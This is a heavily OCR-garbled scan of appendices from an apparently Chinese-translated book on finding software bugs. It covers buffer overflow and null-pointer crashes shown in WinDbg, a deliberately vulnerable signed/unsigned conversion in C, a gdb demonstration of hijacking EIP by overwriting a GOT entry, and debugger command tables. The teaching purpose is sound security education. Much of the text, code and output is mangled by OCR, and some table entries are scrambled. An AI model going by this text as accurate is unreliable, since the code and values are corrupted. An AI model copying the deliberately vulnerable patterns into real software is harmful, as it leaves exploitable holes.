3€3€C3EC3JE JE JE JE E JC JC JE JE JE E 3€ JE JE 3E JE JE 3E 3E € 9€ 3E E J€ 3€ 3€ 3€ E 3€ JE € J€ JE JE 3E E E E 3E E E 3EXE E € JE 3E 3E EC 3E 3E € 9€ 3€ 3€ J€ 9€ 3E 3E 3E E E 3E 3E 3€ 3€ 3€ € 9€ 3E € 3X 
Executable search path is: 
ModLoad: 00400000 0040c000 imageü00400000 

| iModLoad: 77890000 77bb7ü000 ntdll.dll 
ModLoad: 77150000 7722c000 C:\Windowsssystem32s\kernel32 dll 
(£60,1324): Break instruction exception — code 80000003 (first chance) 
eax-ü0000000 ebx-00000000 ecz-D0012faf8 edx-77af5e74 &ezsi-fffffife edi-77adcl9e 
eip-277ad8b2e esp=0012£b10 ebp=0012fb40 iopl=0 nv up El pl zr na pe nc 
es=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 ef 1=00000246 
x«*x ERROR: Synbol file could not be found Defaulted to export symbols for ntdll.dll - 


int 3 


: Access violation — code cO000005 (first chance) 
First chance exceptions are reported before any exception handling. 
This exception may be expected and handled. 
eax-ÜU012ff20 ebx-7719b68f ecx-00971a9c edx-ab0üU04343 esi-00000002 edi-00001772 
gip-43434343 esp-0012ff34 gbp-42424242 iopl=0 nv up ei pl nz ac po nc 
Ycs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 ef 1=00010212 
7772 





LAO Con Sys0;<Local> PracOO0:f60 ThrdD001328 =5)) de TAPS Hui 


图 A-2 Windows 下 的 栈 缓 冲 区 溢出 ( WinDbg 的 输出 ) 
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以 上 只 是 对 缓冲 区 溢出 的 简短 介绍 。 关 于 这 个 话题 有 很 多 书籍 和 白皮书 。 如 
果 想 了 解 更 多 ， 我 推荐 Jon Erickson 的 《黑客 之 道 : 漏洞 发 掘 的 艺术 放 或 者 可 以 
输入 buffer overflows, TE Google 的 海量 在 线 信息 中 搜索 。 





A.2 空 指针 解 引用 


内 存 被 划分 成 页 ( page )。 通 党 进程、 线程 或 内 核 不 能 读 写 零 页 内 存 。 代 码 清 
单 A-2 是 一 个 简单 的 例子 ， 展 示 了 由 于 编程 错误 引用 零 页 内存 时 会 发 生 什 么 。 








代码 清单 A-2 ”使 用 未 分 配 内 存 一 一 一 个 空 指针 解 引 用 的 例子 


01 #include <stdio.h> 


02 

03 typedef struct pkt { 

04 char * value; 

05 } pkt 七 ; 

06 

07 int 

08 main (void) 

09 { 

10 pkt t * packet = NULL; 
11 

12 printf ("Xs", packet-»value); 
13 

14 return 0; 

15 } 


代码 清单 A-2 的 第 10 行 ， 结 构 指 针 变 量 packet 初始 化 为 NULL。 第 121151 H] 
了 packet AY Sia et VY packet 是 空 指 针 NULL, 这 个 引用 可 表示 为 NULL->value。 
程序 试图 读 取 和 零 员 内存 时 会 导致 一 个 典型 的 空 指针 解 引 用 (NULL pointer 
dereference )。 如 果 在 Microsoft Windows 下 编译 这 个 程序 ， 并 在 Windows 调试 需 
WinDbg 下 运行 它 〈( 见 B.2 节 )， 可 以 看 到 如 下 结 











ixl 
(1334.12dc): Access violation - code c0000005 (first chance) 
First chance exceptions are reported before any exception handling. 
This exception may be expected and handled. 
eax=00000000 ebx-7713b68f ecx=00000001 edx-77€55e74 esi-00000002 edi=00001772 
eip-0040100e esp-0012ff34 ebp-0012ff38 iopl=0 nv up ei pl zr na pe nc 
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 ef1=00010246 
*** WARNING: Unable to verify checksum for image00400000 
*** ERROR: Module load completed but symbols could not be loaded for imageo0400000 
image00400000+0x100e: 
0040100e 8b08 mov ecx,dword ptr [eax] 4ds:0023:00000000-???????? 


[ 


150 | 附录 人 A 捉 虫 提示 








这 次 非法 访问 ( access violation ) 是 由 于 引用 了 值 为 oxoooooooo 的 EAX APF Ato 
使 用 调试 命令 !analyze - v 可 以 查看 更 多 导致 月 演 的 信息 。 


0:000» lanalyze -v 


[..] 

FAULTING IP: 

image00400000+100e 

0040100e 8b08 mov ecx,dword ptr [eax] 


EXCEPTION RECORD: ffffffff -- (.exr Oxffffffffffffffff) 
ExceptionAddress: 0040100e (image0040000040x0000100e) 
ExceptionCode: c0000005 (Access violation) 
ExceptionFlags: 00000000 
NumberParameters: 2 
Parameter[0]: 00000000 
Parameter[1]: 00000000 
Attempt to read from address 00000000 
Dos 





空 指针 解 引 用 通常 会 导 人 臻 有 汤 洞 的 组 件 朋 演 (或 者 拒绝 服务 )。 空 指 针 解 引用 
也 会 导致 任意 代码 执行 ( arbitrary code execution )， 视 具体 的 编程 错误 而 定 。 


A3 ” C 语 言 里 的 类 型 转换 


C 二 言 对 不 同 数 据 类 型 的 处 理 非常 姑 活 。 举 例 来 说 ， 在 C 语言 中 ， 把 一 个 学 
和 从 数组 转换 成 一 个 有 符号 整 型 是 很 容易 的 事 。C 语言 中 有 两 种 类 型 转换 : PAR 
型 转换 和 显 式 类 型 转换 。 像 C 这 样 的 编程 声言 中 ， 隐 陈 类 型 转换 在 编 详 希 目 动 转 
换 变 量 的 类 型 时 发 生 ， 这 种 转换 往往 出 现在 变量 的 初始 类 型 和 你 打算 对 它 执行 的 
操作 不 相 匹 配 的 情况 下 。 隐 式 类 型 转换 通常 也 称 为 coercion。 

显 式 类 型 转换 ， 也 称 为 casting， 发 生 在 程序 员 明 确 编 写 转换 代码 时 ， 通 常用 
类 型 转换 运算 和 从 实现 。 

下 面 就 是 一 个 隐 式 类 型 转换 的 例子 。 





[..] 
unsigned int user input 
signed int length 


[..] 
这 个 例子 中 ， 在 无 符号 整 型 和 有 符号 整 型 之 间 发 生 了 一 次 隐 式 类 型 转换 。 
这 是 一 个 显 式 类 型 转换 的 例子 。 


0x80000000; 
user input; 
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[++] 
char cbuf| | 
Signed int si 


" AAAA" ; 
*(int *)cbuf; 


这 个 例子 中 ， 在 字符 型 和 有 符号 整 型 之 间 发 生 了 一 次 显 式 类 型 转换 。 
拓 型 转换 非 凋 隐 散 ， 容 多 导致 安全 相关 的 bug。 很 多 和 类 型 转换 有 天 的 漏洞 
征 由 无 符号 整 型 和 有 符号 整 型 之 间 的 转换 导致 的 。 下 面 是 一 个 例子 。 








代码 清单 A-3 ”有 符 扎 整 型 /无 符号 整 型 间 类 型 转换 导致 的 一 个 漏洞 〈implicit'c ) 


01 #include <stdio.h> 

02 

03 unsigned int 

04 get_user length (void) 
05 { 

06 return (Oxffffffff); 


09 int 

10 main (void) 

12 signed int length - 0; 

14 length = get user length (); 


16 printf ("length: Ad ^u (OxXx)Wn", length, length, length); 


17 

18 if (length < 12) 

19 printf ("argument length ok\n"); 

20 else 

21 printf ("Error: argument length too long\n"); 
22 

23 return 0; 

24 } 


代码 清单 A-3 的 源 代码 中 有 一 个 有 符号 整 型 /无 符号 整 型 间 类 型 转换 的 漏洞 ， 
和 我 在 FFmpeg 中 找到 的 那个 非常 像 〈 见 第 4 草 )， 你 能 找 出 来 吗 ? 

第 14 行 ， 谈 和 用户 输入 的 长 度 但 ， 将 其 保存 在 一 个 有 符号 整 型 变量 length 
Hs PRIA get_user_length() 是 一 个 哑 孙 数 ， 总 是 返回 “用 户 输 入 什 ”oxffffffff。 
我 们 假设 这 就 是 从 网 络 或 者 数据 文件 中 读 到 的 值 。 第 18 行 , 程序 检查 用 户 提供 的 
长 度 值 是 否 小 于 12， 如 果 小 于 12， 屏 幕 上 将 会 显示 字符 串 argument length ok. 
因为 变量 length 被 赋值 为 oxffffffff， 这 个 值 远 大 于 12， 很 明显 这 个 字符 串 不 会 
显示 在 屏 草 上。 然而, 我们 来 看 看 在 Windows Vista SP2 下 编译 并 运行 这 个 程序 会 
发 生 什么 。 
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C:\Users\tk\BHD>cl /nologo implicit.c 
implicit.c 


C: \Users\tk\BHD>implicit.exe 


length: -1 4294967295 (Oxffffffff) 
argument length ok 


正 像 从 输出 结 采 中 看 到 的 ， 第 19 行 代码 被 执行 到 了 。 为 什么 会 这 样 ? 

32 位 机 器 中 ， 无 符号 整 型 的 范围 是 0 到 4294967295， 有 符号 整 型 的 范围 是 
-2147483648 到 2147483647。 无 符号 整数 值 oxffffffff (4294967295 ) 用 二 进 制 
表示 是 1111 1111 1111 1111 1111 1111 1111 1111 ( 见 图 A-3 )。 如 果 把 这 个 位 模式 
解释 为 有 符号 整 型 ,数值 的 符号 将 发 生变 化 ， 变 成 有 符号 整 型 的 -1。 一 个 数 的 符 
号 由 其 符号 位 标识 ,通常 由 最 高 有 效 位 (MSB, Most Significant Bit ) 表示 。MSB 
为 0 时 数值 是 正 数 ， 为 1 时 数值 是 负数 。 











FF i111 1111 1111 1111 1111 1111 1111 1111 |—> 





MSB 


K| A-3 MSB 的 作用 
简 而 言 之 ， 无 符号 整 型 转换 为 有 符号 整 型 时 各 个 位 并 没有 变 ， 但 数值 要 用 新 
的 类 型 来 解释 。ox80000000 到 oxffffffff 之 间 的 无 符号 整 型 ， 转 换 为 有 符号 整 型 
后 都 会 变 成 负数 (UA A-4 )。 








FF | FF | FF | FF | 4244467245 = -1 | 


图 A-4 整数 类 型 转换 ， 从 无 符号 整 型 到 有 符号 整 型 
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是 C/C++ 中 隐 式 和 显 式 类 型 转换 的 一 个 简短 介绍 。C/C++ 类 型 转换 的 完 
整 详尽 介绍 以 及 相关 的 安全 问题 可 参考 Mark Dowd, John McDonald 和 Justin Schuh 
的 著作 The Art of Software Security Assessment: Identifying and Avoiding Software 
Vulnerabilities (Addison-Wesley, 2007). 


这 只 


A.4 GOTS 


一 旦 发 现 内 存 损坏 漏洞 ， 你 可 以 通过 多 种 技 A Fee BEB 32 位 

术 控制 漏洞 进程 的 指令 指针 寄存 器 。 其 中 一 种 技 。 Peeran Linux 60 平台， 
术 叫 做 GOT #3. ELF (Executable and Linkable Format ) 与 对 象 中 有 个 所 谓 全 局 
偏 移 量 表 (GOT, Global Offset Table ), GOT 履 写 就 是 通过 操纵 GOT 中 的 入口 来 
控制 指令 指针 。 这 种 技术 只 对 ELF 文件 格式 有 效 ， 所 以 它 只 能 在 支持 该 格式 的 平 
S ETE (例如 Linux, Solaris 和 BSD )。 

GOT 位 于 ELF 的 数据 段 中 , 叫 .got 段 。 它 的 用 途 是 把 位 置 无 关 的 地 址 计算 重 
定位 到 一 个 绝对 位 置 ， 因 此 它 保 存 了 动态 链接 代码 所 使 用 的 函数 调用 符号 的 绝对 
位 置 。 程 序 首 次 调用 某 个 库 消 数 时 ,运行 时 链接 编辑 器 ( runtime link editor, rtld ) 
找到 相应 的 符号 , 把 它 重 定位 到 GOT. 之 后 每 次 调用 这 个 函数 都 会 将 控制 权 直 接 
转向 那个 位 置 ， 而 不 再 调用 rtld。 代 码 清 单 A-4 解释 了 这 一 过 程 。 














代码 清单 A-4 ”演示 GOT 功能 的 样 例 代码 ( got.c ) 
02 

03 int 

04 main (void) 


06 int i= 16; 


08 printf ("%d\n", i); 
09 printf ("%x\n", i); 


11 return 0; 


代码 清单 A-4 中 的 程序 两 次 调用 库 函 数 printf()。 打 开 调 试 从 号 ( debugging 
symbol) 编译 选项 编译 这 个 程序 ， 在 调试 套 中 运行 (关于 下 面 这些 调 试 命令 的 摘 
述 见 B.4 市 ), 
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linux$ gcc -g -o got got.c 
linux$ gdb -q ./got 
(gdb) set disassembly-flavor intel 


(gdb) disassemble main 
Dump of assembler code for function main: 


0x080483c4 <main+0>: push ebp 

0x080483c5 <main+1>: mov ebp,esp 

0x080483c7 <main+3>: and esp,Oxfffffffo 
0x080483ca <main+6>: sub esp,0x20 

0x080483cd <main+9>: mov DWORD PTR [esp+0x1c | ,0x10 
0x080483d5 «main-17»: mov eax, 0x80484d0 
0x080483da <main+22>: mov edx,DWORD PTR [esp+0x1c | 
0x080483de <main+26>: mov DWORD PTR [esp+0x4] , edx 
0x080483e2 <maint+30>: mov DWORD PTR [esp],eax 
0x080483e5 <maint33>: call 0x80482fc «printfüplt» 
0x080483ea <maint+38>: mov eax, 0x80484d4 
0x080483ef <maint+43>: mov edx,DWORD PTR [esp+0x1c | 
0x080483f3 <main+47>: mov DWORD PTR [esp«0x4] ,edx 
0x080483f7 <main+51>: mov DWORD PTR [esp],eax 
0x080483fa <maint54>: call 0x80482fc «printfüplt» 
0x080483ff <main+59>: mov eax, Ox0 

0x08048404 <main+64>: leave 

0x08048405 <main+65>: ret 


End of assembler dump. 


这 个 main() 函 数 的 反 汇 编 代 人 码 显 示 了 过 程 链 接 表 ( Procedure Linkage Table, 
PLT ) "P FRA printf() 的 地 址 。 和 GOT 将 位 置 无 关 的 地 址 重 定位 到 绝对 位 置 类 似 ， 
PLT 会 将 位 置 无 关 的 也 数 调用 重 定位 到 绝对 位 置 。 


(gdb) x/1i 0x80482fc 


0x80482fc <printf@plt>: jmp DWORD PTR ds:0x80495d8 


这 个 PLT 入 口 立 即 跳 转 到 GOT。 


(gdb) x/1x 0x80495d8 


Ox80495d8 < GLOBAL OFFSET TABLE 420»:  0x08048302 


如 果 这 个 库 函 数 之 前 没有 调用 过 ，GOT 入 口 指 回 到 PLT, 在 PLT 中 ,一 个 重 
定位 偏 移 被 压 入 栈 , 然后 程序 的 执行 重新 回 到 init) eR, 在 这 里 rtld 得 以 调用 ， 
从 而 定位 printf() 符 号 的 引用 。 





(gdb) x/2i 0x08048302 
0x8048302 <printf@plt+6>: 
0x8048307 <printf@plt+11>: 


0x10 
0x80482cc 


push 
jmp 


AE NAA BRUCH] PRAEC printf() 时 发 生 了 什么 。 首先 , REZ printf() 





的 第 二 次 调用 前 设置 一 个 断 点 。 


0 


#include <stdio.h> 


(gdb) list 
^ 

3 int 

4 

5 

6 

7 

8 

9 

10 


main (void) 


int 1 


(gdb) break 9 
Breakpoint 1 at Ox80483ea: file got.c, line 9. 


然后 


(gdb) run 


4 


运行 程序 。 


= 16; 


printf ("%d\n", i); 
printf ("%x\n", i); 


Starting program: /home/tk/BHD/got 
16 


Breakpoint 1, main () at got.c:9 
9 printf ("%x\n", i); 


Dr fd. AARI i main 


(gdb) disassemble main 
Dump of assembler code for function main: 


0x080483c4 
0x080483c5 
0x080483c7 
0x080483ca 
0x080483cd 
0x080483d5 
0x080483da 
0x080483de 
0x080483e2 
0x080483e5 
0x080483ea 
0x080483ef 
0x080483f3 
0x080483f7 
0x080483fa 
0x080483ff 
0x08048404 
0x08048405 


<main+0>: 
«main-c1»: 
<maint+3>: 
<main+6>: 
«main-c9»: 


<main+17>: 
<main+22>: 
<main+26>: 
«main-c30»: 
<main+33>: 
<maint+38>: 
<main+43>: 
<main+47>: 
<maint+51>: 
<main+54>: 
<maint+59>: 
<main+64>: 
<main+65>: 


push 
mov 
and 
sub 
mov 
mov 
mov 
mov 
mov 
call 
mov 
mov 
mov 
mov 
call 
mov 
leave 
ret 


End of assembler dump. 


确实 调用 了 PLT 中 的 同一 个 地 址 。 





晒 数 ， 看 看 是 否 调用 了 同一 个 PLT 地 址 。 


ebp 

ebp,esp 

esp,Oxfffffffo 

esp,0x20 

DWORD PTR [esp+0x1c | ,0x10 
eax, 0x80484d0 

edx,DWORD PTR [esp+0x1c ] 
DWORD PTR [esp+0x4],edx 
DWORD PTR [esp],eax 
0x80482fc <printf@plt> 
eax, 0x80484d4 

edx,DWORD PTR [esp+0x1c | 
DWORD PTR [esp+0x4] ,edx 
DWORD PTR [esp],eax 
0x80482fc «printfüplt» 
eax, 0x0 
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(gdb) x/1i 0x80482fc 
0x80482fc «printfüplt»: jmp DWORD PTR ds:0x80495d8 


被 调用 的 PLT 入 口 仍 旧 立 即 跳 转 到 GOT. 


(gdb) x/1x 0x80495d8 
Ox80495d8 < GLOBAL OFFSET TABLE 420»: — Oxb7ed21co 


但 是 这 一 次 ,printf() 的 GOT 入 口 改 变 了 ,现在 它 直 接 指 回 libc 中 的 printf() 
KIZ 


(gdb) x/10i 0xb7ed21c0 

Oxb7ed21cO «printf»: push ebp 

Oxb7ed21c1 <printf+1>: mov ebp,esp 

Oxb7ed21c3 <printf+3>: push ebx 

Oxb7ed21c4 <printf+4>: call Oxb7ea1iaaf 

Oxb7ed21c9 <printf+9>: add ebx, Oxfae2b 

Oxb7ed21cf <printf+15>: sub esp, Oxc 

Oxb7ed21d2 <printf+18>: lea eax, [ebp+0xc | 
Oxb7ed21d5 <printf+21>: mov DWORD PTR [esp+0x8],eax 
Oxb7ed21d9 <printf+25>: mov eax,DWORD PTR [ebp+0x8 | 
Oxb7ed21dc <printf+28>: mov DWORD PTR [esp+0x4], eax 


现在 ， 如 果 我 们 改变 printf() 的 GOT AF Hane, WA LI printf() 被 调用 
时 控制 程序 的 执行 流 。 
(gdb) set variable *(0x80495d8)=0x41414141 


(gdb) x/1x 0x80495d8 
0x80495d8 < GLOBAL OFFSET TABLE 420»: 0x41414141 


(gdb) continue 
Continuing. 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 


(gdb) info registers eip 
eip 0x41414141 0x41414141 


我 们 实现 了 对 EIP 的 控制 .真实 世界 中 使 用 这 种 漏洞 利用 技术 的 例子 见 第 4 草 。 
要 确定 一 个 库 函 数 的 GOT 地 址 , 你 可 以 像 前 面 的 例子 那样 使 用 调试 器 ,也 可 
以 使 用 objdump 或 readelf 命令 。 





linux$ objdump -R got 
got: file format elf32-i386 


DYNAMIC RELOCATION RECORDS 


OFFSET TYPE VALUE 

080495c0 R 386 GLOB DAT gmon start _ 
080495d0 R 386 JUMP SLOT gmon start _ 
080495d4 R 386 JUMP SLOT —  libc start main 
080495d8 R 386 JUMP SLOT printf 


linux$ readelf -r got 


附录 A te Rien 


Relocation section '.rel.dyn' at offset 0x27c contains 1 entries: 


Offset Info | Type Sym. Value 
080495cO 00000106 R 386 GLOB DAT 00000000 


Sym. Name 
| gmon start — 


Relocation section '.rel.plt' at offset 0x284 contains 3 entries: 


Offset Info | Type Sym. Value 
080495d0 00000107 R 386 JUMP SLOT 00000000 
080495d4 00000207 R 386 JUMP SLOT 00000000 
080495d8 00000307 R 386 JUMP SLOT ^ 00000000 


附注 


Sym. Name 

|. gmon start — 

. libc start main 
printf 
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[1] ELF 的 介绍 可 参考 TIS 委员 会 的 Tool Interface Standard( TIS ) Executable and Linking Format 
(ELF ) Specification, Version 1.2, 1995, 链接 : http://refspecs.freestandards.org/elf/elf.pdf ( 短 


HEX http://bit.ly/z2c6qz ). 
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B.1 Solaris 的 Modular 调 试 器 (mdb) 


以 下 表格 列 出 了 一 些 有 用 的 mdb (Solaris Modular Debugger) 命令 。 完 整 的 
可 用 命令 列表 见 Solaris Modular Debugger Guide |", 


B.1.1 局 动 和 结束 mdb 


A a 
Ap 


> si 述 

mdb program 启动 mdb 开 始 调试 program 

mdb unix.<n> 在 内 核 崩 让 dump 文 件 上 运行 mdb (unix.<n> 和 vmcore.<n> 文 件 通 常 可 以 在 
vmcore.«n» H 3/var/crash/«hostname»? rf fk FI] ) 

$q IB IA A as 


* ^4 人 
B12 ”通用 命令 
m CENE. 
::run arguments 运行 被 调试 程序 (指定 参数 arguments )。 如 果 目 标 正在 运行 或 是 一 
个 内 核 文 件 ，mdb 可 能 会 重 局 这 个 程序 
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B.1.3 Bra 











命 $ 描 述 
address: :bp 在 命令 中 给 出 的 address 位 置 处 设置 一 个 新 的 断 点 
$b 列 出 已 设置 断 点 信息 
::delete number 移 除 之 前 设置 的 第 number 个 断 点 
B.1.4 运行 调试 目标 
ff Jfü x 
:Ss 执行 单条 指令 ， 会 单 步 进入 子 函 数 
:e 执行 单条 指令 ， 不 会 进入 子 国 数 
:Cc 继续 执行 
B.1.5 查看 数据 
it $F 描 述 
address, 以 指定 格式 format 打 印 地 址 address 处 指定 数量 (count) 的 对 象 ， 有 具体 格 
count/format 式 包括 B (十 六 进 制 ，1 字 节 )，X (十 六 进 制 ，4 字 节 )，S (字符 串 ) 
B.1.6 ”信息 查询 命令 
命 $ 描 述 
$r 列 出 寄存 器 和 寄存 器 值 
$c FT EN ER CUR FEL Fed 
address: : dis 以 机 器 指令 形式 转 储 address 附 近 一 段 内 存 的 内 容 
B.1.7 ”其 他 命令 
命 令 描 述 
: :status 打印 与 当前 目标 相关 的 信息 摘要 
: :msgbuf 显示 消息 缓冲 区 的 内 容 ， 包 括 内 核 错误 之 前 的 所 有 控制 台 信 息 


B.2 Windows 调 试 器 (WinDbg) 


以 下 表格 列 出 了 WinDbg 的 一 些 有 用 的 调 斌 命令。 完整 的 可 用 命令 列表 可 以 
参考 Mario Hewardt 和 Daniel Pravat 所 车 的 Advanced Windows Debugging 一 书 或 
WinDbg 目 币 的 文档 。 
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B.2.1 启动 和 结束 调试 会 话 


i $ 描 x 
File > Open Executable... 点 击 File 菜 单 的 Open Executable 来 启动 一 个 新 的 用 户 态 进程 并 加 以 调试 
File Attach to a Process... 点 击 File 菜 单 的 Attach to a Process 来 调试 一 个 正在 运行 的 用 户 态 应 用 程序 
q 结束 调试 会 话 
B.2.2 通用 命令 
i $F 描 xh 
g 开始 或 继续 执行 
B.2.3 WA 
i $F 描 xh 
bp address 在 命令 中 指定 的 address 处 设置 一 个 新 断 点 


bl 
bc breakpoint ID 


B.2.4 运行 调试 目标 


A> 


B.2.5 ”查看 数据 


A 4 
Ap < 


dd address 
du address 
dt 


poi(address) 
B.2.6 ”信息 查询 命令 
e 


kb 


u address 


列 出 所 有 已 设置 断 点 的 信息 
移 除 breakpoint ID 对 应 的 已 设置 断 点 


描 X 
执行 单条 指令 或 单行 源 代 码 ， 并 《可 选 地 ) 显示 所 有 寄存 器 和 标志 
位 的 当前 值 。 该 命令 会 单 步 进入 子 函 数 
执行 单条 指令 或 单行 源 代码 ， 并 (可 选 地 ) 显示 所 有 寄存 器 和 标志 
位 的 当前 值 。 该 命令 不 会 进入 子 函数 


描 述 
以 双 字 值 (4 字 节 ) 显示 address 地 址 的 内 容 
以 unicode 字 符 方 式 显示 address 地 址 的 内 容 
显示 局 部 变量 、 全 局 变量 或 结构 体 和 联合 体 等 数据 类 型 的 信息 
从 指定 的 address 地 址 返回 指针 长 度 的 数据 (pointer-sized data) 。 指 针 的 
大 小 是 32 位 或 64 位 ， 取 决 于 系统 架构 











描 x 
列 出 寄存 器 和 寄存 器 值 
打印 函数 调用 栈 的 回 济 
以 机 器 指令 形式 转 储 address 附 近 一 段 内 存 的 内 容 
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B27 ”其 他 命令 














i F 描 ” e 
lanalyze -v TRUM GR ARSE T He Bes oe ten 2 UH JH fe. 
!drvobj DRIVER OBJECT 该 调试 器 扩展 显示 DRIVER_0BJECT 的 详细 信息 
.sympath 这 条 命令 改变 调试 器 符号 搜索 的 默认 路 径 
.reload 这 条 命令 删除 所 有 符号 信息 并 按 需 要 重新 加 载 符号 








B.3 Windows 内 核 调 试 
为 了 分 析 第 6 草 描 述 的 漏洞 ， 需 要 一 个 调试 Windows 内 核 的 方法 。 我 用 
VMware" fil WinDbg" 按 以 下 步骤 搭建 调试 环境 o 





D 第 一 步 : 为 远程 内 核 调 试 配置 VMware 的 本 意 附 录 中 我 使 用 以 下 
客户 机 系统 。 软件 版 本: VMware Workstation 
口 第 二 步 : 调整 客户 机 系统 的 boot.ini- 6.5.2 fa WinDbg 6.10.3.233. 
a 第 三 步 : 为 调试 Windows VEZ BUE: VMware 
f& EULERI WinDbg. 


B.3.1 第 一 步 : 为 远程 内 核 调试 配置 VMware 的 客户 机 系统 


安装 了 Windows XP SP3 VMware 客户 机 系统 之 后 , 我 关闭 了 客户 机 系统 并 从 
VMware 的 命令 区 ( Commands section ) 中 选择 Edit Virtual Machine Settings。 然 后 
Rich Add 按钮 增加 一 个 新 的 串口 ， 选 择 如 图 B-1 和 图 B-2 显示 的 配置 。 





"Add Hardware Wizard. in e 


Serial Port Type 
What media should this serial port access? 


Serial port 
(^) Use physical serial port on the host 
(^) Output to file 





« Back | Next > | | Cancel | 








图 B-1 输出 到 命名 管道 
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Specify Socket 
Which socket should this serial port connect to? 





Named pipe 


\\\pipe \com_1 


Device status 
Connect at power on 











图 B-2 命名 管道 配置 


新 的 串口 添加 成 功 后 ， 我 在 “LO mode” 区 域 选 择 了 “Yield CPU on poll” 复 
选 框 ， 如 图 B-3 所 示 。 


Device status 
T] Connected 


$ Memory 1024 MB [V] Connect at power on 
Gea) Hard Disk (IDE) 8 GB ] 
(&)CD/DVD (IDE) Auto detect Cretam 

H] Floppy Auto detect (F) Use physical serial port: 
si Network Adapter Host-only Auto detect 
@uss Controller Present GN 
if) sound Card Auto detect 
@serial Port Using named pi,,, 
Display Auto detect p te anie cipe: 


Device Summary 





C Use output file: 











BÉ Processors i M. \pipe com 1 


| This end is the server. | 


|The other end is an application. - 








e the guest m system tc use this serial 
port in polled mode (as opposed to interrupt mode), 














图 B-3 新 串口 的 配置 


B.3.2 第 二 调整 客户 机 系统 的 boot.ini 


然后 启动 这 个 VMware 客户 系统 并 编辑 Windows XP boot.ini 文件 ， 以 包含 
DE FRERUR ( 粗 体 部 分 激活 内 核 调 试 )。 
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[boot loader | 
timeout=30 
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 


[operating systems | 
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" / 


noexecute-optin /fastdetect 
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional - 


Debug" /fastdetect /debugport=com1 


RIK POLARS, we SAP AY eA "Microsoft Windows XP 
Professional — Debug [debugger enabled] ”来 启动 系统 ， 如 图 B-4 Pra. 





fa == 
| J Window. (P Pro SP3 (BHD) - VMware Wor ‘tation, 
File Edit View WM Team Windows Help 


和 iS | Seah Dee cS dg 


t the operating 





crosoft Windows XP Profess 


Use the up and down arrow keys to 
|Press ENTER to choose. 


1 advanced startup options for Windows, press Fé 


E direct input to this VM, click inside or press Ctrl+G, 区 (3 Bl fs) Ji [c] ü | i A 
\ 一 RE 











图 B-4 新 的 局 动 沫 单 选项 


B3.3 ”第 三 步 : 为 调试 Windows 内 核 配 置 VMware 簿 主机 上 的 WinDbg 





最 后 一 步 就 是 配置 VMware fg EULERI WinDbg, 以 便 让 WinDbg 通过 管道 附 
加 到 VMware 客户 机 系统 的 内 核 上 。 为 此 ， 我 创建 了 一 个 如 图 B-5 所 示 的 批 处 理 


|-File- Edit Format’ View (Help 
windbg -b -k com:pipe,port='\\\. \pipe\\com_1,resets=0 





图 B-5 ”内核 调试 用 的 WinDbg 批 处 理 文件 
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然后 , 双击 这 个 批 处 理 文 件 , 把 VMware fi 3: BL E83 WinDbg 附加 到 VMware 
Windows XP 客户 机 系统 的 内 核 上 ， 如 图 B-6 所 示 。 


emel 'comipipe po rt=\\\pipe\com 3 rests C WinDbg:8.10.,0003 233 KaR 





y afal ET CY) E JT mio ton 4 | ^a m 


o 


Break instruction exception 一 code 80000003 (first chance) 
| PEPE FE FE FE FE FE FE FEE FEE FE JE 3E 3E 3E 3E 3E 3E 3€ HE 3€ 3€ 3€ 3€ 3€ 3€ 3€ E 3E 3E 3E 3E 3E JEJE JEJE JEJE JEJE JE 3E JE 3E 3€ 3E 3E 3E 3€ 3E 3€ 3E 3E 3E 3E 3E 3€ SEE 3€ 3€ 3€ 3€ 3€ 3€ 3€ 3€ 3€ 3€ EERE 


* 


You are seeing this message because you pressed either 
CTRL+C (if you run kd exe) or, 
CTRL+BREAK (if you run VinDBG). 

on your debugger machine's keyboard. 


THIS IS NOT A BUG OR A SYSTEM CRASH 


Me If you did not intend to break into the debugger, press the "g" key, then 
* press the "Enter" key now. This message might immediately reappear. If it 


Nu" does, press "g" and "Enter" again. 


3* 
* 
* 
* 
* 
3* 
* 
* 
* 
3* 
* 


其 
| 3€ 3€ 3€ 3€ 3€ 3€ HE 3€ 3€ 3€ 3€ 3 HE 3€ HE HE 3€ 3€ 3€ 3€ HE 3€ 3€ 9€ 3€ 3€ 9€ 3€ JE E 3€ 3€ 3€ 3€ 3€ 3€ 9€ 3€ 3€ 9€ 3€ 3€ 9€ 3€ 3€ 9€ 3€ 9€ 3€ 3€ 9€ 3€ 3€ 2€ 3€ 9€ 2€ 3€ 9€ 2€ € E 3€ 3€ 3€ 3€ 9E 3€ 3€ 9€ 3€ 3€ 9€ 3€ 39€ 9€ 3€ 9€ 3€ | 
int | DbgBreakPointWithStatus+O0xd: 
80527 bdc cc int 3 











CAPS dul 





图 B-6 BP Raita ( WinDbg ) 


B.4 GNUR 


以 下 表格 列 出 了 一 些 有 用 的 GNU Hiir (gdb) 命令 。 完 整 的 可 用 命令 列表 
见 gdb ERI, 


B.4.1 启动 和 结束 gdb 


t $ jo xA 
gdb program 启动 gdb 开 始 调试 program 
quit AR HH Val s 


B.4.2 ”通用 命令 


®t $ jo XA 
run arguments 运行 被 调试 程序 (指定 参数 arguments) 


attach processID 把 调试 器 附加 到 PID 为 processID 的 进程 上 


B.4.3 HA 


break «file:» function 
break «file:» line number 
break *address 

info breakpoints 


delete number 
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描 述 
FR it function eibi. 起 始 处 设置 一 个 断 点 
定 的 代码 行 起 始 处 设置 一 个 断后 


在 指定 的 
在 line number (文件 file 中 ) 
ee 
列 出 已 设置 断 点 信息 

删除 number 指 定 的 已 设置 断 点 








B.4.4 运行 调试 目标 
i $ 描 述 
stepi 执行 一 条 机 絮 指 令 。 单 步 进 入 子 函数 
nexti 执行 一 条 机 器 指令 。 不 会 进入 子 函 数 
continue 继续 执行 
B45 ”查看 数据 
Mm $ 描 述 
x/CountFormatSize 旨 定 格式 Format 打 印 地 址 address 处 指定 大 小 Size、 指 定数 量 Count 的 对 象 
address Size; b ( 字 节 )，h CEF), w ( 字 )，g (giant8 字 节 ) 
Format; o (八进制 ) x (十 六 进 制 )，d (十 进 制 )，u (无 符号 十 进 制 ),，t (二 
进 制 )，f ( 浮 点 数 )，a (HAE), i GRA), c (F), s (ZR) 
B.46 ”信息 查询 命令 
$ S "HET 
